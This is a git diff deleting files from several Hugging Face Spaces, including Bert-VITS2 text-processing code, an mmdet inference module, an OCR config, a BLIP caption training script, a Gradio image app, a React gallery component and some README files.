        diff --git a/spaces/digitalxingtong/Azusa-Bert-VITS2/text/cleaner.py b/spaces/digitalxingtong/Azusa-Bert-VITS2/text/cleaner.py deleted file mode 100644 index 64bd5f7296f66c94f3a335666c53706bb5fe5b39..0000000000000000000000000000000000000000 --- a/spaces/digitalxingtong/Azusa-Bert-VITS2/text/cleaner.py +++ /dev/null @@ -1,27 +0,0 @@ -from text import chinese, cleaned_text_to_sequence - - -language_module_map = { - 'ZH': chinese -} - - -def clean_text(text, language): - language_module = language_module_map[language] - norm_text = language_module.text_normalize(text) - phones, tones, word2ph = language_module.g2p(norm_text) - return norm_text, phones, tones, word2ph - -def clean_text_bert(text, language): - language_module = language_module_map[language] - norm_text = language_module.text_normalize(text) - phones, tones, word2ph = language_module.g2p(norm_text) - bert = language_module.get_bert_feature(norm_text, word2ph) - return phones, tones, bert - -def text_to_sequence(text, language): - norm_text, phones, tones, word2ph = clean_text(text, language) - return cleaned_text_to_sequence(phones, tones, language) - -if __name__ == '__main__': - pass diff --git a/spaces/digitalxingtong/Lixiang-Bert-Vits2/text/english.py b/spaces/digitalxingtong/Lixiang-Bert-Vits2/text/english.py deleted file mode 100644 index 781d0a56cef71f66fc67db51d76538be90d3ddd2..0000000000000000000000000000000000000000 --- a/spaces/digitalxingtong/Lixiang-Bert-Vits2/text/english.py +++ /dev/null @@ -1,138 +0,0 @@ -import pickle -import os -import re -from g2p_en import G2p -from string import punctuation - -from text import symbols - -current_file_path = os.path.dirname(__file__) -CMU_DICT_PATH = os.path.join(current_file_path, 'cmudict.rep') -CACHE_PATH = os.path.join(current_file_path, 'cmudict_cache.pickle') -_g2p = G2p() - -arpa = {'AH0', 'S', 'AH1', 'EY2', 'AE2', 'EH0', 'OW2', 'UH0', 'NG', 'B', 'G', 'AY0', 'M', 'AA0', 'F', 'AO0', 'ER2', 'UH1', 'IY1', 'AH2', 'DH', 'IY0', 'EY1', 'IH0', 'K', 'N', 'W', 'IY2', 'T', 'AA1', 'ER1', 'EH2', 'OY0', 'UH2', 'UW1', 'Z', 'AW2', 'AW1', 'V', 'UW2', 'AA2', 'ER', 'AW0', 'UW0', 'R', 'OW1', 'EH1', 'ZH', 'AE0', 'IH2', 'IH', 'Y', 'JH', 'P', 'AY1', 'EY0', 'OY2', 'TH', 'HH', 'D', 'ER0', 'CH', 'AO1', 'AE1', 'AO2', 'OY1', 'AY2', 'IH1', 'OW0', 'L', 'SH'} - - -def post_replace_ph(ph): - rep_map = { - ':': ',', - ';': ',', - ',': ',', - '。': '.', - '!': '!', - '?': '?', - '\n': '.', - "·": ",", - '、': ",", - '...': '…', - 'v': "V" - } - if ph in rep_map.keys(): - ph = rep_map[ph] - if ph in symbols: - return ph - if ph not in symbols: - ph = 'UNK' - return ph - -def read_dict(): - g2p_dict = {} - start_line = 49 - with open(CMU_DICT_PATH) as f: - line = f.readline() - line_index = 1 - while line: - if line_index >= start_line: - line = line.strip() - word_split = line.split(' ') - word = word_split[0] - - syllable_split = word_split[1].split(' - ') - g2p_dict[word] = [] - for syllable in syllable_split: - phone_split = syllable.split(' ') - g2p_dict[word].append(phone_split) - - line_index = line_index + 1 - line = f.readline() - - return g2p_dict - - -def cache_dict(g2p_dict, file_path): - with open(file_path, 'wb') as pickle_file: - pickle.dump(g2p_dict, pickle_file) - - -def get_dict(): - if os.path.exists(CACHE_PATH): - with open(CACHE_PATH, 'rb') as pickle_file: - g2p_dict = pickle.load(pickle_file) - else: - g2p_dict = read_dict() - cache_dict(g2p_dict, CACHE_PATH) - - return g2p_dict - -eng_dict = get_dict() - -def refine_ph(phn): - tone = 0 - if re.search(r'\d$', phn): - tone = int(phn[-1]) + 1 - phn = phn[:-1] - return phn.lower(), tone - -def refine_syllables(syllables): - tones = [] - phonemes = [] - for phn_list in syllables: - for i in range(len(phn_list)): - phn = phn_list[i] - phn, tone = refine_ph(phn) - phonemes.append(phn) - tones.append(tone) - return phonemes, tones - - -def text_normalize(text): - # todo: eng text normalize - return text - -def g2p(text): - - phones = [] - tones = [] - words = re.split(r"([,;.\-\?\!\s+])", text) - for w in words: - if w.upper() in eng_dict: - phns, tns = refine_syllables(eng_dict[w.upper()]) - phones += phns - tones += tns - else: - phone_list = list(filter(lambda p: p != " ", _g2p(w))) - for ph in phone_list: - if ph in arpa: - ph, tn = refine_ph(ph) - phones.append(ph) - tones.append(tn) - else: - phones.append(ph) - tones.append(0) - # todo: implement word2ph - word2ph = [1 for i in phones] - - phones = [post_replace_ph(i) for i in phones] - return phones, tones, word2ph - -if __name__ == "__main__": - # print(get_dict()) - # print(eng_word_to_phoneme("hello")) - print(g2p("In this paper, we propose 1 DSPGAN, a GAN-based universal vocoder.")) - # all_phones = set() - # for k, syllables in eng_dict.items(): - # for group in syllables: - # for ph in group: - # all_phones.add(ph) - # print(all_phones) \ No newline at end of file diff --git a/spaces/digitalxingtong/Luzao-Bert-Vits2/commons.py b/spaces/digitalxingtong/Luzao-Bert-Vits2/commons.py deleted file mode 100644 index 9ad0444b61cbadaa388619986c2889c707d873ce..0000000000000000000000000000000000000000 --- a/spaces/digitalxingtong/Luzao-Bert-Vits2/commons.py +++ /dev/null @@ -1,161 +0,0 @@ -import math -import numpy as np -import torch -from torch import nn -from torch.nn import functional as F - - -def init_weights(m, mean=0.0, std=0.01): - classname = m.__class__.__name__ - if classname.find("Conv") != -1: - m.weight.data.normal_(mean, std) - - -def get_padding(kernel_size, dilation=1): - return int((kernel_size*dilation - dilation)/2) - - -def convert_pad_shape(pad_shape): - l = pad_shape[::-1] - pad_shape = [item for sublist in l for item in sublist] - return pad_shape - - -def intersperse(lst, item): - result = [item] * (len(lst) * 2 + 1) - result[1::2] = lst - return result - - -def kl_divergence(m_p, logs_p, m_q, logs_q): - """KL(P||Q)""" - kl = (logs_q - logs_p) - 0.5 - kl += 0.5 * (torch.exp(2. * logs_p) + ((m_p - m_q)**2)) * torch.exp(-2. * logs_q) - return kl - - -def rand_gumbel(shape): - """Sample from the Gumbel distribution, protect from overflows.""" - uniform_samples = torch.rand(shape) * 0.99998 + 0.00001 - return -torch.log(-torch.log(uniform_samples)) - - -def rand_gumbel_like(x): - g = rand_gumbel(x.size()).to(dtype=x.dtype, device=x.device) - return g - - -def slice_segments(x, ids_str, segment_size=4): - ret = torch.zeros_like(x[:, :, :segment_size]) - for i in range(x.size(0)): - idx_str = ids_str[i] - idx_end = idx_str + segment_size - ret[i] = x[i, :, idx_str:idx_end] - return ret - - -def rand_slice_segments(x, x_lengths=None, segment_size=4): - b, d, t = x.size() - if x_lengths is None: - x_lengths = t - ids_str_max = x_lengths - segment_size + 1 - ids_str = (torch.rand([b]).to(device=x.device) * ids_str_max).to(dtype=torch.long) - ret = slice_segments(x, ids_str, segment_size) - return ret, ids_str - - -def get_timing_signal_1d( - length, channels, min_timescale=1.0, max_timescale=1.0e4): - position = torch.arange(length, dtype=torch.float) - num_timescales = channels // 2 - log_timescale_increment = ( - math.log(float(max_timescale) / float(min_timescale)) / - (num_timescales - 1)) - inv_timescales = min_timescale * torch.exp( - torch.arange(num_timescales, dtype=torch.float) * -log_timescale_increment) - scaled_time = position.unsqueeze(0) * inv_timescales.unsqueeze(1) - signal = torch.cat([torch.sin(scaled_time), torch.cos(scaled_time)], 0) - signal = F.pad(signal, [0, 0, 0, channels % 2]) - signal = signal.view(1, channels, length) - return signal - - -def add_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4): - b, channels, length = x.size() - signal = get_timing_signal_1d(length, channels, min_timescale, max_timescale) - return x + signal.to(dtype=x.dtype, device=x.device) - - -def cat_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4, axis=1): - b, channels, length = x.size() - signal = get_timing_signal_1d(length, channels, min_timescale, max_timescale) - return torch.cat([x, signal.to(dtype=x.dtype, device=x.device)], axis) - - -def subsequent_mask(length): - mask = torch.tril(torch.ones(length, length)).unsqueeze(0).unsqueeze(0) - return mask - - -@torch.jit.script -def fused_add_tanh_sigmoid_multiply(input_a, input_b, n_channels): - n_channels_int = n_channels[0] - in_act = input_a + input_b - t_act = torch.tanh(in_act[:, :n_channels_int, :]) - s_act = torch.sigmoid(in_act[:, n_channels_int:, :]) - acts = t_act * s_act - return acts - - -def convert_pad_shape(pad_shape): - l = pad_shape[::-1] - pad_shape = [item for sublist in l for item in sublist] - return pad_shape - - -def shift_1d(x): - x = F.pad(x, convert_pad_shape([[0, 0], [0, 0], [1, 0]]))[:, :, :-1] - return x - - -def sequence_mask(length, max_length=None): - if max_length is None: - max_length = length.max() - x = torch.arange(max_length, dtype=length.dtype, device=length.device) - return x.unsqueeze(0) < length.unsqueeze(1) - - -def generate_path(duration, mask): - """ - duration: [b, 1, t_x] - mask: [b, 1, t_y, t_x] - """ - device = duration.device - - b, _, t_y, t_x = mask.shape - cum_duration = torch.cumsum(duration, -1) - - cum_duration_flat = cum_duration.view(b * t_x) - path = sequence_mask(cum_duration_flat, t_y).to(mask.dtype) - path = path.view(b, t_x, t_y) - path = path - F.pad(path, convert_pad_shape([[0, 0], [1, 0], [0, 0]]))[:, :-1] - path = path.unsqueeze(1).transpose(2,3) * mask - return path - - -def clip_grad_value_(parameters, clip_value, norm_type=2): - if isinstance(parameters, torch.Tensor): - parameters = [parameters] - parameters = list(filter(lambda p: p.grad is not None, parameters)) - norm_type = float(norm_type) - if clip_value is not None: - clip_value = float(clip_value) - - total_norm = 0 - for p in parameters: - param_norm = p.grad.data.norm(norm_type) - total_norm += param_norm.item() ** norm_type - if clip_value is not None: - p.grad.data.clamp_(min=-clip_value, max=clip_value) - total_norm = total_norm ** (1. / norm_type) - return total_norm diff --git a/spaces/dineshreddy/WALT/mmdet/apis/inference.py b/spaces/dineshreddy/WALT/mmdet/apis/inference.py deleted file mode 100644 index 464d1e2dec8bd30304ec8018922681fe63b77970..0000000000000000000000000000000000000000 --- a/spaces/dineshreddy/WALT/mmdet/apis/inference.py +++ /dev/null @@ -1,217 +0,0 @@ -import warnings - -import mmcv -import numpy as np -import torch -from mmcv.ops import RoIPool -from mmcv.parallel import collate, scatter -from mmcv.runner import load_checkpoint - -from mmdet.core import get_classes -from mmdet.datasets import replace_ImageToTensor -from mmdet.datasets.pipelines import Compose -from mmdet.models import build_detector - - -def init_detector(config, checkpoint=None, device='cuda:0', cfg_options=None): - """Initialize a detector from config file. - - Args: - config (str or :obj:`mmcv.Config`): Config file path or the config - object. - checkpoint (str, optional): Checkpoint path. If left as None, the model - will not load any weights. - cfg_options (dict): Options to override some settings in the used - config. - - Returns: - nn.Module: The constructed detector. - """ - if isinstance(config, str): - config = mmcv.Config.fromfile(config) - elif not isinstance(config, mmcv.Config): - raise TypeError('config must be a filename or Config object, ' - f'but got {type(config)}') - if cfg_options is not None: - config.merge_from_dict(cfg_options) - config.model.pretrained = None - config.model.train_cfg = None - model = build_detector(config.model, test_cfg=config.get('test_cfg')) - if checkpoint is not None: - map_loc = 'cpu' if device == 'cpu' else None - checkpoint = load_checkpoint(model, checkpoint, map_location=map_loc) - if 'CLASSES' in checkpoint.get('meta', {}): - model.CLASSES = checkpoint['meta']['CLASSES'] - else: - warnings.simplefilter('once') - warnings.warn('Class names are not saved in the checkpoint\'s ' - 'meta data, use COCO classes by default.') - model.CLASSES = get_classes('coco') - model.cfg = config # save the config in the model for convenience - model.to(device) - model.eval() - return model - - -class LoadImage(object): - """Deprecated. - - A simple pipeline to load image. - """ - - def __call__(self, results): - """Call function to load images into results. - - Args: - results (dict): A result dict contains the file name - of the image to be read. - Returns: - dict: ``results`` will be returned containing loaded image. - """ - warnings.simplefilter('once') - warnings.warn('`LoadImage` is deprecated and will be removed in ' - 'future releases. You may use `LoadImageFromWebcam` ' - 'from `mmdet.datasets.pipelines.` instead.') - if isinstance(results['img'], str): - results['filename'] = results['img'] - results['ori_filename'] = results['img'] - else: - results['filename'] = None - results['ori_filename'] = None - img = mmcv.imread(results['img']) - results['img'] = img - results['img_fields'] = ['img'] - results['img_shape'] = img.shape - results['ori_shape'] = img.shape - return results - - -def inference_detector(model, imgs): - """Inference image(s) with the detector. - - Args: - model (nn.Module): The loaded detector. - imgs (str/ndarray or list[str/ndarray] or tuple[str/ndarray]): - Either image files or loaded images. - - Returns: - If imgs is a list or tuple, the same length list type results - will be returned, otherwise return the detection results directly. - """ - - if isinstance(imgs, (list, tuple)): - is_batch = True - else: - imgs = [imgs] - is_batch = False - - cfg = model.cfg - device = next(model.parameters()).device # model device - - if isinstance(imgs[0], np.ndarray): - cfg = cfg.copy() - # set loading pipeline type - cfg.data.test.pipeline[0].type = 'LoadImageFromWebcam' - - cfg.data.test.pipeline = replace_ImageToTensor(cfg.data.test.pipeline) - test_pipeline = Compose(cfg.data.test.pipeline) - - datas = [] - for img in imgs: - # prepare data - if isinstance(img, np.ndarray): - # directly add img - data = dict(img=img) - else: - # add information into dict - data = dict(img_info=dict(filename=img), img_prefix=None) - # build the data pipeline - data = test_pipeline(data) - datas.append(data) - - data = collate(datas, samples_per_gpu=len(imgs)) - # just get the actual data from DataContainer - data['img_metas'] = [img_metas.data[0] for img_metas in data['img_metas']] - data['img'] = [img.data[0] for img in data['img']] - if next(model.parameters()).is_cuda: - # scatter to specified GPU - data = scatter(data, [device])[0] - else: - for m in model.modules(): - assert not isinstance( - m, RoIPool - ), 'CPU inference with RoIPool is not supported currently.' - - # forward the model - with torch.no_grad(): - results = model(return_loss=False, rescale=True, **data) - - if not is_batch: - return results[0] - else: - return results - - -async def async_inference_detector(model, img): - """Async inference image(s) with the detector. - - Args: - model (nn.Module): The loaded detector. - img (str | ndarray): Either image files or loaded images. - - Returns: - Awaitable detection results. - """ - cfg = model.cfg - device = next(model.parameters()).device # model device - # prepare data - if isinstance(img, np.ndarray): - # directly add img - data = dict(img=img) - cfg = cfg.copy() - # set loading pipeline type - cfg.data.test.pipeline[0].type = 'LoadImageFromWebcam' - else: - # add information into dict - data = dict(img_info=dict(filename=img), img_prefix=None) - # build the data pipeline - test_pipeline = Compose(cfg.data.test.pipeline) - data = test_pipeline(data) - data = scatter(collate([data], samples_per_gpu=1), [device])[0] - - # We don't restore `torch.is_grad_enabled()` value during concurrent - # inference since execution can overlap - torch.set_grad_enabled(False) - result = await model.aforward_test(rescale=True, **data) - return result - - -def show_result_pyplot(model, - img, - result, - score_thr=0.3, - title='result', - wait_time=0): - """Visualize the detection results on the image. - - Args: - model (nn.Module): The loaded detector. - img (str or np.ndarray): Image filename or loaded image. - result (tuple[list] or list): The detection result, can be either - (bbox, segm) or just bbox. - score_thr (float): The threshold to visualize the bboxes and masks. - title (str): Title of the pyplot figure. - wait_time (float): Value of waitKey param. - Default: 0. - """ - if hasattr(model, 'module'): - model = model.module - model.show_result( - img, - result, - score_thr=score_thr, - show=True, - wait_time=wait_time, - win_name=title, - bbox_color=(72, 101, 241), - text_color=(72, 101, 241)) diff --git a/spaces/dinhminh20521597/OCR_DEMO/configs/textrecog/nrtr/nrtr_r31_1by16_1by8_academic.py b/spaces/dinhminh20521597/OCR_DEMO/configs/textrecog/nrtr/nrtr_r31_1by16_1by8_academic.py deleted file mode 100644 index b7adc0d30cda5e5556821ff941d6e00dcd3b4ba7..0000000000000000000000000000000000000000 --- a/spaces/dinhminh20521597/OCR_DEMO/configs/textrecog/nrtr/nrtr_r31_1by16_1by8_academic.py +++ /dev/null @@ -1,48 +0,0 @@ -_base_ = [ - '../../_base_/default_runtime.py', - '../../_base_/schedules/schedule_adam_step_6e.py', - '../../_base_/recog_pipelines/nrtr_pipeline.py', - '../../_base_/recog_datasets/ST_MJ_train.py', - '../../_base_/recog_datasets/academic_test.py' -] - -train_list = {{_base_.train_list}} -test_list = {{_base_.test_list}} - -train_pipeline = {{_base_.train_pipeline}} -test_pipeline = {{_base_.test_pipeline}} - -label_convertor = dict( - type='AttnConvertor', dict_type='DICT90', with_unknown=True) - -model = dict( - type='NRTR', - backbone=dict( - type='ResNet31OCR', - layers=[1, 2, 5, 3], - channels=[32, 64, 128, 256, 512, 512], - stage4_pool_cfg=dict(kernel_size=(2, 1), stride=(2, 1)), - last_stage_pool=True), - encoder=dict(type='NRTREncoder'), - decoder=dict(type='NRTRDecoder'), - loss=dict(type='TFLoss'), - label_convertor=label_convertor, - max_seq_len=40) - -data = dict( - samples_per_gpu=128, - workers_per_gpu=4, - train=dict( - type='UniformConcatDataset', - datasets=train_list, - pipeline=train_pipeline), - val=dict( - type='UniformConcatDataset', - datasets=test_list, - pipeline=test_pipeline), - test=dict( - type='UniformConcatDataset', - datasets=test_list, - pipeline=test_pipeline)) - -evaluation = dict(interval=1, metric='acc') diff --git a/spaces/dinnovos/chatbot-shoe-store/README.md b/spaces/dinnovos/chatbot-shoe-store/README.md deleted file mode 100644 index 2a43718e77af61f1feaf60ab729a40e8dedcbe13..0000000000000000000000000000000000000000 --- a/spaces/dinnovos/chatbot-shoe-store/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Chatbot for Shoe Store -emoji: 📚 -colorFrom: yellow -colorTo: blue -sdk: streamlit -sdk_version: 1.21.0 -app_file: app.py -pinned: false -license: mit ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/dma123/gpt-js/index.html b/spaces/dma123/gpt-js/index.html deleted file mode 100644 index 431922abf46aac283bc8d54e35971d6c16822440..0000000000000000000000000000000000000000 --- a/spaces/dma123/gpt-js/index.html +++ /dev/null @@ -1,129 +0,0 @@ - - - - - - - GPT JS Chat - - - - - -
        - -
        -
        -
        -
        - - -
        -
        -
        - - -
        -

            - - - -
        -
        -

        -
        - -
        - -
        - - -

        -

        -
        - - -

        -

        -
        - - -

        -

        -
        - -
        - -
        - - -

        -

        -

        -
        -
        - - -
        -
        - - -
        -
        -

        -
        - - - - - - - - - - - - - \ No newline at end of file diff --git a/spaces/doevent/blip/train_caption.py b/spaces/doevent/blip/train_caption.py deleted file mode 100644 index 7c639ac646b9a1b8074b6e9c2343b961de76db05..0000000000000000000000000000000000000000 --- a/spaces/doevent/blip/train_caption.py +++ /dev/null @@ -1,206 +0,0 @@ -''' - * Copyright (c) 2022, salesforce.com, inc. - * All rights reserved. - * SPDX-License-Identifier: BSD-3-Clause - * For full license text, see LICENSE.txt file in the repo root or https://opensource.org/licenses/BSD-3-Clause - * By Junnan Li -''' -import argparse -import os -import ruamel_yaml as yaml -import numpy as np -import random -import time -import datetime -import json -from pathlib import Path - -import torch -import torch.nn as nn -import torch.nn.functional as F -import torch.backends.cudnn as cudnn -import torch.distributed as dist -from torch.utils.data import DataLoader - -from models.blip import blip_decoder -import utils -from utils import cosine_lr_schedule -from data import create_dataset, create_sampler, create_loader -from data.utils import save_result, coco_caption_eval - -def train(model, data_loader, optimizer, epoch, device): - # train - model.train() - - metric_logger = utils.MetricLogger(delimiter=" ") - metric_logger.add_meter('lr', utils.SmoothedValue(window_size=1, fmt='{value:.6f}')) - metric_logger.add_meter('loss', utils.SmoothedValue(window_size=1, fmt='{value:.4f}')) - header = 'Train Caption Epoch: [{}]'.format(epoch) - print_freq = 50 - - for i, (image, caption, _) in enumerate(metric_logger.log_every(data_loader, print_freq, header)): - image = image.to(device) - - loss = model(image, caption) - - optimizer.zero_grad() - loss.backward() - optimizer.step() - - metric_logger.update(loss=loss.item()) - metric_logger.update(lr=optimizer.param_groups[0]["lr"]) - - # gather the stats from all processes - metric_logger.synchronize_between_processes() - print("Averaged stats:", metric_logger.global_avg()) - return {k: "{:.3f}".format(meter.global_avg) for k, meter in metric_logger.meters.items()} - - -@torch.no_grad() -def evaluate(model, data_loader, device, config): - # evaluate - model.eval() - - metric_logger = utils.MetricLogger(delimiter=" ") - header = 'Caption generation:' - print_freq = 10 - - result = [] - for image, image_id in metric_logger.log_every(data_loader, print_freq, header): - - image = image.to(device) - - captions = model.generate(image, sample=False, num_beams=config['num_beams'], max_length=config['max_length'], - min_length=config['min_length']) - - for caption, img_id in zip(captions, image_id): - result.append({"image_id": img_id.item(), "caption": caption}) - - return result - - -def main(args, config): - utils.init_distributed_mode(args) - - device = torch.device(args.device) - - # fix the seed for reproducibility - seed = args.seed + utils.get_rank() - torch.manual_seed(seed) - np.random.seed(seed) - random.seed(seed) - cudnn.benchmark = True - - #### Dataset #### - print("Creating captioning dataset") - train_dataset, val_dataset, test_dataset = create_dataset('caption_coco', config) - - if args.distributed: - num_tasks = utils.get_world_size() - global_rank = utils.get_rank() - samplers = create_sampler([train_dataset,val_dataset,test_dataset], [True,False,False], num_tasks, global_rank) - else: - samplers = [None, None, None] - - train_loader, val_loader, test_loader = create_loader([train_dataset, val_dataset, test_dataset],samplers, - batch_size=[config['batch_size']]*3,num_workers=[4,4,4], - is_trains=[True, False, False], collate_fns=[None,None,None]) - - #### Model #### - print("Creating model") - model = blip_decoder(pretrained=config['pretrained'], image_size=config['image_size'], vit=config['vit'], - vit_grad_ckpt=config['vit_grad_ckpt'], vit_ckpt_layer=config['vit_ckpt_layer'], - prompt=config['prompt']) - - model = model.to(device) - - model_without_ddp = model - if args.distributed: - model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.gpu]) - model_without_ddp = model.module - - optimizer = torch.optim.AdamW(params=model.parameters(), lr=config['init_lr'], weight_decay=config['weight_decay']) - - best = 0 - best_epoch = 0 - - print("Start training") - start_time = time.time() - for epoch in range(0, config['max_epoch']): - if not args.evaluate: - if args.distributed: - train_loader.sampler.set_epoch(epoch) - - cosine_lr_schedule(optimizer, epoch, config['max_epoch'], config['init_lr'], config['min_lr']) - - train_stats = train(model, train_loader, optimizer, epoch, device) - - val_result = evaluate(model_without_ddp, val_loader, device, config) - val_result_file = save_result(val_result, args.result_dir, 'val_epoch%d'%epoch, remove_duplicate='image_id') - - test_result = evaluate(model_without_ddp, test_loader, device, config) - test_result_file = save_result(test_result, args.result_dir, 'test_epoch%d'%epoch, remove_duplicate='image_id') - - if utils.is_main_process(): - coco_val = coco_caption_eval(config['coco_gt_root'],val_result_file,'val') - coco_test = coco_caption_eval(config['coco_gt_root'],test_result_file,'test') - - if args.evaluate: - log_stats = {**{f'val_{k}': v for k, v in coco_val.eval.items()}, - **{f'test_{k}': v for k, v in coco_test.eval.items()}, - } - with open(os.path.join(args.output_dir, "evaluate.txt"),"a") as f: - f.write(json.dumps(log_stats) + "\n") - else: - save_obj = { - 'model': model_without_ddp.state_dict(), - 'optimizer': optimizer.state_dict(), - 'config': config, - 'epoch': epoch, - } - - if coco_val.eval['CIDEr'] + coco_val.eval['Bleu_4'] > best: - best = coco_val.eval['CIDEr'] + coco_val.eval['Bleu_4'] - best_epoch = epoch - torch.save(save_obj, os.path.join(args.output_dir, 'checkpoint_best.pth')) - - log_stats = {**{f'train_{k}': v for k, v in train_stats.items()}, - **{f'val_{k}': v for k, v in coco_val.eval.items()}, - **{f'test_{k}': v for k, v in coco_test.eval.items()}, - 'epoch': epoch, - 'best_epoch': best_epoch, - } - with open(os.path.join(args.output_dir, "log.txt"),"a") as f: - f.write(json.dumps(log_stats) + "\n") - - if args.evaluate: - break - dist.barrier() - - total_time = time.time() - start_time - total_time_str = str(datetime.timedelta(seconds=int(total_time))) - print('Training time {}'.format(total_time_str)) - - -if __name__ == '__main__': - parser = argparse.ArgumentParser() - parser.add_argument('--config', default='./configs/caption_coco.yaml') - parser.add_argument('--output_dir', default='output/Caption_coco') - parser.add_argument('--evaluate', action='store_true') - parser.add_argument('--device', default='cuda') - parser.add_argument('--seed', default=42, type=int) - parser.add_argument('--world_size', default=1, type=int, help='number of distributed processes') - parser.add_argument('--dist_url', default='env://', help='url used to set up distributed training') - parser.add_argument('--distributed', default=True, type=bool) - args = parser.parse_args() - - config = yaml.load(open(args.config, 'r'), Loader=yaml.Loader) - - args.result_dir = os.path.join(args.output_dir, 'result') - - Path(args.output_dir).mkdir(parents=True, exist_ok=True) - Path(args.result_dir).mkdir(parents=True, exist_ok=True) - - yaml.dump(config, open(os.path.join(args.output_dir, 'config.yaml'), 'w')) - - main(args, config) \ No newline at end of file diff --git a/spaces/dotku/fastapi-demo/README.md b/spaces/dotku/fastapi-demo/README.md deleted file mode 100644 index f67d7cadf842e6c169daa850a8ce518160178e63..0000000000000000000000000000000000000000 --- a/spaces/dotku/fastapi-demo/README.md +++ /dev/null @@ -1,10 +0,0 @@ ---- -title: Fastapi Demo -emoji: 🐠 -colorFrom: red -colorTo: red -sdk: docker -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/elun15/image-regression/README.md b/spaces/elun15/image-regression/README.md deleted file mode 100644 index c345f1960aa5cc4b0b9bdc68a5a197c86104f490..0000000000000000000000000000000000000000 --- a/spaces/elun15/image-regression/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Image Regression -emoji: 🐢 -colorFrom: gray -colorTo: purple -sdk: gradio -sdk_version: 3.19.1 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/ennov8ion/Scifi-Models/app.py b/spaces/ennov8ion/Scifi-Models/app.py deleted file mode 100644 index ec2cb8b57d725f327bfacd3fbd886edca193180a..0000000000000000000000000000000000000000 --- a/spaces/ennov8ion/Scifi-Models/app.py +++ /dev/null @@ -1,94 +0,0 @@ -import gradio as gr -import os -import sys -from pathlib import Path - -models = [ - {"name": "Future Diffusion", "url": "nitrosocke/Future-Diffusion"}, - {"name": "JWST Deep Space Diffusion", "url": "dallinmackay/JWST-Deep-Space-diffusion"}, - {"name": "Robo Diffusion 3 Base", "url": "nousr/robo-diffusion-2-base"}, - {"name": "Robo Diffusion", "url": "nousr/robo-diffusion"}, - {"name": "Tron Legacy Diffusion", "url": "dallinmackay/Tron-Legacy-diffusion"}, -] - -current_model = models[0] - -text_gen = gr.Interface.load("spaces/daspartho/prompt-extend") - -models2 = [] -for model in models: - model_url = f"models/{model['url']}" - loaded_model = gr.Interface.load(model_url, live=True, preprocess=True) - models2.append(loaded_model) - - -def text_it(inputs, text_gen=text_gen): - return text_gen(inputs) - - -def set_model(current_model_index): - global current_model - current_model = models[current_model_index] - return gr.update(value=f"{current_model['name']}") - - -def send_it(inputs, model_choice): - proc = models2[model_choice] - return proc(inputs) - - -with gr.Blocks() as myface: - gr.HTML( - - ) - - with gr.Row(): - with gr.Row(): - input_text = gr.Textbox(label="Prompt idea", placeholder="", lines=1) - # Model selection dropdown - model_name1 = gr.Dropdown( - label="Choose Model", - choices=[m["name"] for m in models], - type="index", - value=current_model["name"], - interactive=True, - ) - with gr.Row(): - see_prompts = gr.Button("Generate Prompts") - run = gr.Button("Generate Images", variant="primary") - - with gr.Row(): - output1 = gr.Image(label="") - output2 = gr.Image(label="") - output3 = gr.Image(label="") - with gr.Row(): - magic1 = gr.Textbox(label="Generated Prompt", lines=2) - magic2 = gr.Textbox(label="Generated Prompt", lines=2) - magic3 = gr.Textbox(label="Generated Prompt", lines=2) - with gr.Row(): - output4 = gr.Image(label="") - output5 = gr.Image(label="") - output6 = gr.Image(label="") - with gr.Row(): - magic4 = gr.Textbox(label="Generated Prompt", lines=2) - magic5 = gr.Textbox(label="Generated Prompt", lines=2) - magic6 = gr.Textbox(label="Generated Prompt", lines=2) - - model_name1.change(set_model, inputs=model_name1, outputs=[output1, output2, output3, output4, output5, output6]) - - run.click(send_it, inputs=[magic1, model_name1], outputs=[output1]) - run.click(send_it, inputs=[magic2, model_name1], outputs=[output2]) - run.click(send_it, inputs=[magic3, model_name1], outputs=[output3]) - run.click(send_it, inputs=[magic4, model_name1], outputs=[output4]) - run.click(send_it, inputs=[magic5, model_name1], outputs=[output5]) - run.click(send_it, inputs=[magic6, model_name1], outputs=[output6]) - - see_prompts.click(text_it, inputs=[input_text], outputs=[magic1]) - see_prompts.click(text_it, inputs=[input_text], outputs=[magic2]) - see_prompts.click(text_it, inputs=[input_text], outputs=[magic3]) - see_prompts.click(text_it, inputs=[input_text], outputs=[magic4]) - see_prompts.click(text_it, inputs=[input_text], outputs=[magic5]) - see_prompts.click(text_it, inputs=[input_text], outputs=[magic6]) - -myface.queue(concurrency_count=200) -myface.launch(inline=True, show_api=False, max_threads=400) \ No newline at end of file diff --git a/spaces/enzostvs/stable-diffusion-tpu/components/main/collections/index.tsx b/spaces/enzostvs/stable-diffusion-tpu/components/main/collections/index.tsx deleted file mode 100644 index fa60a200699ffabb83166293655691fa86dd6211..0000000000000000000000000000000000000000 --- a/spaces/enzostvs/stable-diffusion-tpu/components/main/collections/index.tsx +++ /dev/null @@ -1,80 +0,0 @@ -import classNames from "classnames"; -import { createBreakpoint } from "react-use"; -import { AnimatePresence } from "framer-motion"; -import InfiniteScroll from "react-infinite-scroller"; - -import { Image } from "@/utils/type"; -import { useCollections } from "@/components/main/hooks/useCollections"; -import { Modal } from "@/components/modal/modal"; -import { Collection } from "./collection"; -import { CollectionLoading } from "./loading"; -import { useCollection } from "@/components/modal/useCollection"; - -const useBreakpoint = createBreakpoint({ XL: 1280, L: 1024, S: 768, XS: 640 }); - -export const Collections: React.FC<{ category: string }> = ({ category }) => { - const { open, setOpen } = useCollection(); - const { images, loading, infiniteRefetch, pagination, infiniteLoading } = - useCollections(category); - const breakpoint = useBreakpoint(); - - if (loading) return null; - - return ( - <> - { - if (infiniteLoading) return; - infiniteRefetch(); - }} - hasMore={pagination?.total_pages > pagination?.page} - className="mx-auto grid grid-cols-1 md:grid-cols-3 lg:grid-cols-4 xl:grid-cols-5 gap-5 mt-8 lg:mt-14" - > - {images?.map((collection: Image, i: number) => - collection?.loading ? ( - - ) : ( - - ) - )} - - null}> - {open !== null && setOpen(null)} />} - - - ); -}; diff --git a/spaces/epexVfeibi/Imagedeblurr/2011 04 01 Lolita Cheng Set 15 Rar TOP.md 